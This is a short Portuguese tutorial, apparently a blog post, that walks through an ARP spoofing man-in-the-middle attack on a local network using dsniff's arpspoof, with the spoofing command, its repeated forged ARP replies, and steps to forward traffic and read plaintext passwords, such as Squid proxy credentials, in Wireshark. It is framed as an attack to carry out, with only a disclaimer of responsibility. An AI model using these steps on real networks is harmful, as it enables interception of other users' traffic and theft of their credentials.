Vamos ao ataque !!!!
Instale na sua maquina o pacote de programas DSNIFF esse vem com diversos programas incluindo o arpspoof que é o que vamos usar. vamos entender a topologia do teste. sendo o ip do gateway 176.16.0.9/24, seu ip 176.16.0.10/24 e 90:e6:ba:7a:a:3a o MAC você vai executar o programa deste modoroot@fullmetal# sudo arpspoof 176.16.0.9 90:e6:ba:7a:a:3a ff:ff:ff:ff:ff:ff 0806 42: arp reply 176.16.0.9 is-at 90:e6:ba:7a:a:3a 90:e6:ba:7a:a:3a ff:ff:ff:ff:ff:ff 0806 42: arp reply 176.16.0.9 is-at 90:e6:ba:7a:a:3a 90:e6:ba:7a:a:3a ff:ff:ff:ff:ff:ff 0806 42: arp reply 176.16.0.9 is-at 90:e6:ba:7a:a:3a 90:e6:ba:7a:a:3a ff:ff:ff:ff:ff:ff 0806 42: arp reply 176.16.0.9 is-at 90:e6:ba:7a:a:3a 90:e6:ba:7a:a:3a ff:ff:ff:ff:ff:ff 0806 42: arp reply 176.16.0.9 is-at 90:e6:ba:7a:a:3a 90:e6:ba:7a:a:3a ff:ff:ff:ff:ff:ff 0806 42: arp reply 176.16.0.9 is-at 90:e6:ba:7a:a:3a 90:e6:ba:7a:a:3a ff:ff:ff:ff:ff:ff 0806 42: arp reply 176.16.0.9 is-at 90:e6:ba:7a:a:3aEste mac que aparece ele é da sua placa de rede, não entendeu??? calma……. você está enviando para a rede toda que este novo MAC responde pelo ip 176.16.0.9 (gateway da rede), resumindo tudo todas as requisições de rede vão passar por sua maquina neste instante abilite a passagem de pacotes pelo kernel e abra um sniffer para verificar isso de preferência o WIRESHARK. Vale lembrar que este procedimento não é indicado para realizar uma auditoria na rede já que irá causar uma baixa na performance da LAN, na visão de um firewall para identificar isso na rede seria simples se tiver um monitoramento constante porque seria fácil identificar um grande numero de pacotes vindos do mesmo lugar. Com o WIRESHARK aberto você poderá ver nas entrelinhas dos pacotes TCP coisas como senhas em texto puro, conversas em texto puro e coisas assim….. veja um exemplo da autenticação do proxy squid…….. na linha “proxy-authorization: ……… ” e em baixo “Credenciais: usuario:senha” Não me responsabilizo por quais danos causados a rede por conta deste post. Obrigado !!!!!!!!!!!!!